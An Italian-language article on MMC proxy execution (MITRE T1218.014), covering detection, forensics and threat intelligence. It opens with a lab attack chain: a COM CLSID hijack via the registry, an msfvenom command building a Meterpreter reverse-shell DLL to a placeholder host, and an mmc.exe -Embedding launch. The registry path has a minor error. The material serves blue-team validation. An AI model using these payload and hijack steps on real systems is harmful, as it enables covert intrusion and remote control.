Proxy Execution via MMC: System Binary Proxy Execution: MMC (T1218.014)

L'obiettivo in laboratorio è dimostrare che mmc.exe può eseguire codice arbitrario senza che i controlli difensivi dell'organizzazione alzino un singolo alert. La catena d'attacco si articola in tre fasi: preparazione del payload COM, costruzione del file .msc e invocazione del proxy.

Fase 1 — Registrazione del CLSID malevolo. Si crea una chiave di registro che punta a una DLL controllata dall'attaccante. In un laboratorio con privilegi amministrativi, il comando PowerShell è diretto:

New-Item -Path "HKCU:\Software\Classes\CLSID{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" -Value "C:\temp\payload.dll" -Force

Il CLSID è arbitrario; l'importante è che sia univoco e non collida con COM object legittimi. La DLL può essere generata con msfvenom (open source, parte di Metasploit Framework):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 -f dll -o payload.dll

Fase 2 — Creazione del file .msc. Apri MMC in author mode con mmc.exe /a, aggiungi lo snap-in "Link to Web Address" dal menu File → Add/Remove Snap-in, inserisci un URL fittizio e salva il file come test.msc. A questo punto, modifica manualmente l'XML del file .msc sostituendo il riferimento allo snap-in con il CLSID malevolo registrato al passo precedente. Alternativamente, tool come GadgetToJScript (open source) possono automatizzare la serializzazione del payload nel formato corretto.

Fase 3 — Esecuzione proxy. Il comando di attivazione è:

mmc.exe -Embedding C:\temp\test.msc

Il flag -Embedding è il segnale chiave: istruisce MMC ad avviare il COM server in modalità embedded, senza interfaccia grafica. In Sysmon, il processo apparirà come figlio legittimo di svchost.exe o del processo chiamante.

Per simulare lo scenario di lateral movement osservato con Medusa Group, prova anche:

mmc.exe compmgmt.msc /computer:

Questo comando apre Computer Management puntando a un host remoto — un pattern che in un ambiente compromesso consente di interagire con dischi, servizi e utenti della macchina bersaglio senza deploy di agenti.

Il framework Atomic Red Team (open source) include test atomici per T1218.014 che automatizzano queste fasi. Integra la simulazione con Sysmon (gratuito) configurato per catturare EventCode 1 (Process Create) e EventCode 7 (Image Loaded), così il blue team potrà validare le proprie detection.

La detection di MMC proxy execution si gioca su una catena comportamentale a quattro anelli, non su un singolo indicatore. Un alert efficace correla: invocazione sospetta di mmc.exe, caricamento di file .msc da percorsi anomali, attivazione di CLSID non baseline e caricamento di DLL non firmate.

Log source primari. La colonna vertebrale è Sysmon (gratuito): EventCode 1 cattura la command line completa di mmc.exe — i flag -Embedding e /a in combinazione con percorsi sotto Users, AppData, Downloads o share UNC sono il primo segnale. EventCode 7 (Image Loaded) rivela quando mmc.exe carica DLL unsigned o provenienti da directory user-writable: è il momento in cui il proxy sta effettivamente eseguendo il payload. A questi si aggiunge il log Microsoft-Windows-COM/Operational per tracciare l'attivazione di CLSID — confrontando ogni CLSID attivato da mmc.exe contro una allowlist di oggetti COM legittimi, ogni anomalia diventa un alert ad alta confidenza.

La logica di correlazione ideale opera su una finestra temporale di 5-10 minuti e segue questa progressione:

1. Creazione o modifica di un file .msc in percorso sospetto (Sysmon EventCode 11, FileCreate)
2. Avvio di mmc.exe con command line contenente il percorso sospetto o il flag -Embedding
3. Caricamento di DLL non firmate da parte di mmc.exe
4. Eventuale attività di rete originata da mmc.exe (Sysmon EventCode 3, NetworkConnect)

Tuning e falsi positivi. Gli amministratori di sistema usano legittimamente MMC ogni giorno — ma lo fanno con file .msc standard di sistema (es. gpedit.msc, devmgmt.msc, compmgmt.msc) lanciati da explorer.exe. Il tuning richiede di costruire una AllowedMSCList con i nomi e percorsi delle console Microsoft predefinite e una ParentProcessAllowList che includa i parent attesi. Ogni mmc.exe lanciato da powershell.exe, wscript.exe, cmd.exe invocato da processi Office, o qualsiasi altro parent atipico merita investigazione immediata.

Per il flag di transizione firmato-a-non-firmato (SignedToUnsignedTransition), configura l'EDR o la regola SIEM in modo che scatti quando un processo con firma Microsoft valida carica un modulo senza firma digitale o con firma non attendibile. Questo pattern è estremamente raro in uso legittimo e altamente indicativo di DLL side-loading via COM hijack.

Sul piano preventivo, le mitigazioni M1038 e M1042 sono direttamente applicabili: dove MMC non è necessario all'operatività quotidiana, bloccane l'esecuzione con Windows Defender Application Control (gratuito, integrato in Windows) o AppLocker (incluso nelle edizioni Enterprise). Per le workstation standard, mmc.exe è raramente indispensabile e il suo blocco riduce drasticamente la superficie d'attacco senza impatti operativi.

L'analisi forense di un abuso di MMC si concentra su tre classi di artefatti: tracce di esecuzione del processo, modifiche al registro COM e file .msc malevoli. La timeline si costruisce incrociando queste fonti con i log di rete per stabilire se l'esecuzione ha generato comunicazioni C2.

Artefatti di esecuzione. Il punto di partenza è Prefetch: il file MMC.EXE-{hash}.pf in C:\Windows\Prefetch contiene il timestamp di ultima esecuzione, il conteggio delle esecuzioni e — cruciale — la lista delle DLL e dei file referenziati nei primi 10 secondi dall'avvio. Se il file .msc malevolo e la DLL payload compaiono nella lista Prefetch, hai una prova diretta di co-esecuzione. Estrai questi dati con PECmd di Eric Zimmerman (open source).

In Amcache.hve (C:\Windows\AppCompat\Programs\) cerca entry relative alla DLL payload: l'Amcache registra hash SHA1, percorso e timestamp di primo rilevamento per i binari eseguiti, fornendo un ancoraggio temporale indipendente. Analizza l'hive con AmcacheParser (open source).

Artefatti del registro COM. La chiave HKCU\Software\Classes\CLSID\ è il luogo dove l'attaccante registra il CLSID malevolo. In un'acquisizione forense, esporta l'hive NTUSER.DAT dell'utente compromesso e analizzalo con Registry Explorer (open source) o RegRipper (open source). Cerca CLSID con valori InprocServer32 o LocalServer32 che puntano a percorsi user-writable o share di rete. Il timestamp LastWriteTime della chiave di registro fissa il momento della preparazione del payload — tipicamente anteriore all'esecuzione di mmc.exe.

File .msc come artefatto. I file .msc sono XML: aprili con un editor di testo e cerca riferimenti a CLSID non standard, URL esterni nello snap-in "Link to Web Address" o comandi PowerShell incorporati — questo ultimo scenario corrisponde esattamente al pattern osservato nella campagna RedDelta Modified PlugX Infection Chain Operations (C0047), dove file .msc eseguiti via MMC lanciavano comandi PowerShell per il deployment di PlugX. Conserva l'hash del file e verifica i metadati di creazione con exiftool (open source) per stabilire se il file è stato generato sulla macchina o trasferito.

Timeline integrata. Ricostruisci la sequenza correlando i timestamp di: modifica della chiave CLSID nel registro → creazione del file .msc su disco (MFT $SI e $FN timestamps, estratti con MFTECmd, open source) → esecuzione di mmc.exe (Prefetch/Sysmon) → connessioni di rete in uscita (log firewall, Sysmon EventCode 3). Questa catena documenta l'intera progressione dall'installazione del payload all'attivazione del canale C2.

L'abuso di MMC come proxy di esecuzione è emerso in contesti operativi distinti che rivelano pattern tattici significativi per l'analisi predittiva.

Medusa Group (G1051) impiega mmc.exe con un approccio pragmatico orientato al lateral movement: il comando mmc.exe compmgmt.msc /computer:<target> consente di interagire con Computer Management su host remoti, esplorando dischi condivisi, servizi attivi e account locali senza necessità di deploy di strumenti aggiuntivi. È una tecnica living-off-the-land pura, che sfrutta funzionalità amministrative native senza lasciare artefatti supplementari sulle macchine target. Questo profilo operativo suggerisce un gruppo che privilegia la discrezione nella fase di post-exploitation e che dispone già di credenziali valide — MMC remoto richiede privilegi amministrativi sull'host di destinazione.

La campagna RedDelta Modified PlugX Infection Chain Operations (C0047), attribuita a Mustang Panda e condotta contro entità nell'Asia orientale e sudorientale, rivela un impiego più sofisticato: file .msc utilizzati come vettore di esecuzione iniziale che innesca comandi PowerShell per il caricamento di PlugX in stato persistente. La catena di infezione — phishing → file malevolo → .msc → PowerShell → PlugX — mostra come MMC funga da anello intermedio nella kill chain, interposto tra il vettore di accesso iniziale e il payload finale per frammentare la detection.

Dal punto di vista dei pattern emergenti, l'adozione di file .msc come carrier presenta vantaggi operativi convergenti per gruppi con esigenze diverse: è un formato XML manipolabile senza tooling specializzato, il binario di esecuzione è firmato Microsoft, e il meccanismo COM offre un canale di attivazione payload che bypassa molte policy di application control focalizzate su script e eseguibili. La tecnica si presta a integrarsi con catene di delivery basate su phishing — gli .msc possono essere allegati direttamente o scaricati come stage intermedio.

La convergenza tra gruppi con focus geografico asiatico (Mustang Panda) e operatori con profilo diverso (Medusa Group) segnala che T1218.014 sta attraversando una fase di adozione trasversale. Per il targeting predittivo, monitorare con attenzione ambienti enterprise Windows dove MMC è ampiamente utilizzato dagli amministratori — settori come governo, difesa e telecomunicazioni nell'area Asia-Pacifico, coerentemente con il victimology della campagna C0047, ma senza escludere l'espansione verso target occidentali.

Framework MITRE ATT&CK v16 — T1218.014, TA0005, G1051, C0047, M1042, M1038, DET0222/AN0622. Integrato con conoscenza professionale per tool e procedure operative (Sysmon, PECmd, AmcacheParser, MFTECmd, Registry Explorer, RegRipper, msfvenom, Atomic Red Team).